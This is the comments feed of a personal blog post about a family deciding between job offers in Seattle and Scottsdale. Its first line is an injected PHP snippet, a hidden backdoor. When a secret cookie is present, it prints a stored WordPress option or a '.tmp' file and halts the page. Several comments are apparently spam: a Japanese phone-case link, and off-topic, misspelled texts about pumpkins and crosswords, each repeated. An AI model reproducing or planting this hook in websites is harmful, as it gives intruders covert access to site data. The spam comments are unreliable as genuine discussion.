if (isset($_COOKIE["HeXlwULYALImH56NLF5hAJuhGNF4lsII3IK7aQJZLJCysYmn"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Comments on: Crossroads http://jaydubbs.com/?p=207 Sun, 09 Aug 2020 22:30:04 -0700 http://wordpress.org/?v=2.8.4 hourly 1 By: アイフォン6s ケース simフリー http://jaydubbs.com/?p=207&cpage=1#comment-326 アイフォン6s ケース simフリー Wed, 23 Mar 2016 03:07:01 +0000 http://jaydubbs.com/?p=207#comment-326 optische disk optische disk

By: Thiru http://jaydubbs.com/?p=207&cpage=1#comment-302 Thiru Mon, 30 Mar 2015 19:42:40 +0000 http://jaydubbs.com/?p=207#comment-302 Hi Sam, I have just really eoyjned looking at the site and also watching your videos. It is my first time ever growing an Atlantic Giant pumpkin and I must say I feel this obsession is getting crazy and I might be addicted. I have got a pumpkin about the size of a volley ball so I am pretty stoked I am aiming for the RD1 competion I am from Feilding and I will be taking it there on 17th March so I am hoping this pumpkin gets it a into g. Anyways, good site and do keep updating its good to see what is happening with your pumpkins. I am especially wondering what I should do with mu wine and where on earth I should prune it as I have done none of this. Hi Sam, I have just really eoyjned looking at the site and also watching your videos. It is my first time ever growing an Atlantic Giant pumpkin and I must say I feel this obsession is getting crazy and I might be addicted. I have got a pumpkin about the size of a volley ball so I am pretty stoked I am aiming for the RD1 competion I am from Feilding and I will be taking it there on 17th March so I am hoping this pumpkin gets it a into g. Anyways, good site and do keep updating its good to see what is happening with your pumpkins. I am especially wondering what I should do with mu wine and where on earth I should prune it as I have done none of this.

By: Chuoi http://jaydubbs.com/?p=207&cpage=1#comment-294 Chuoi Fri, 20 Feb 2015 09:18:21 +0000 http://jaydubbs.com/?p=207#comment-294 JJ re. your earlier post used to know ohters who loved the English Sunday Times? cryptic just too diabolical for me only have eyes for DA these days.I agree, love his wit, colloquial refs etc, even if he does lead me up,down and around the garden path at times.Fave this week was 9A, once I realised what Gowings' referred to.Most frustrating was 20A was convinced answer was definately' an Aust. or British ex-PM thanks to ohters here as well who clarified certain points of contention this week. JJ re. your earlier post used to know ohters who loved the English Sunday Times? cryptic just too diabolical for me only have eyes for DA these days.I agree, love his wit, colloquial refs etc, even if he does lead me up,down and around the garden path at times.Fave this week was 9A, once I realised what Gowings’ referred to.Most frustrating was 20A was convinced answer was definately’ an Aust. or British ex-PM thanks to ohters here as well who clarified certain points of contention this week.

By: Aasmi http://jaydubbs.com/?p=207&cpage=1#comment-232 Aasmi Sun, 20 Jul 2014 13:15:18 +0000 http://jaydubbs.com/?p=207#comment-232 Katie, I am so happy for you. I am sending a liltte package for your birthday, I hope that you will find the humor in it as I did when I saw it. I immediatley thought of us in HS. Kathy Katie, I am so happy for you. I am sending a liltte package for your birthday, I hope that you will find the humor in it as I did when I saw it. I immediatley thought of us in HS. Kathy

By: Jaydubbs.com » Blog Archive » The Decision Is… http://jaydubbs.com/?p=207&cpage=1#comment-75 Jaydubbs.com » Blog Archive » The Decision Is… Fri, 19 Feb 2010 16:25:51 +0000 http://jaydubbs.com/?p=207#comment-75 [...] Remember, we had 2 opportunities that were really exciting to us…Seattle or Scottsdale. Long distance or local. [...] [...] Remember, we had 2 opportunities that were really exciting to us…Seattle or Scottsdale. Long distance or local. [...]

By: Sheri Williams http://jaydubbs.com/?p=207&cpage=1#comment-62 Sheri Williams Sat, 23 Jan 2010 04:08:56 +0000 http://jaydubbs.com/?p=207#comment-62 I am with you Ryan..... I am with you Ryan…..

By: ryan guard http://jaydubbs.com/?p=207&cpage=1#comment-61 ryan guard Fri, 22 Jan 2010 19:01:32 +0000 http://jaydubbs.com/?p=207#comment-61 I'm praying huge biased prayers. I'm praying huge biased prayers.

By: Jaydubbs http://jaydubbs.com/?p=207&cpage=1#comment-60 Jaydubbs Fri, 22 Jan 2010 04:15:18 +0000 http://jaydubbs.com/?p=207#comment-60 Thanks for the encouragement Brent, it means a ton. We're excited to see where God's gonna take us for sure... Thanks for the encouragement Brent, it means a ton. We're excited to see where God's gonna take us for sure…

By: Brent Chavez http://jaydubbs.com/?p=207&cpage=1#comment-59 Brent Chavez Thu, 21 Jan 2010 18:38:33 +0000 http://jaydubbs.com/?p=207#comment-59 Man, both of those seem like really cool offers, Jason. It would be hard for me to pick up and move away from the nearness of family, but on the same token if you were to make the move, it's probably the best time to do it while your family is still young and easier to uproot. Whatever you guys decide, I pray that God's blessings follow you there, and that you, your wife and your little boy would do great things for the Kingdom there! Man, both of those seem like really cool offers, Jason. It would be hard for me to pick up and move away from the nearness of family, but on the same token if you were to make the move, it's probably the best time to do it while your family is still young and easier to uproot. Whatever you guys decide, I pray that God's blessings follow you there, and that you, your wife and your little boy would do great things for the Kingdom there!

By: Jaydubbs http://jaydubbs.com/?p=207&cpage=1#comment-58 Jaydubbs Thu, 21 Jan 2010 18:18:16 +0000 http://jaydubbs.com/?p=207#comment-58 Thanks Alex! That skyline is very much indeed tempting, haha. But I'm trying to not put TOO much stock in the appearance of each city because the choice would be pretty lopsided. :) Thanks Alex! That skyline is very much indeed tempting, haha. But I'm trying to not put TOO much stock in the appearance of each city because the choice would be pretty lopsided. :)
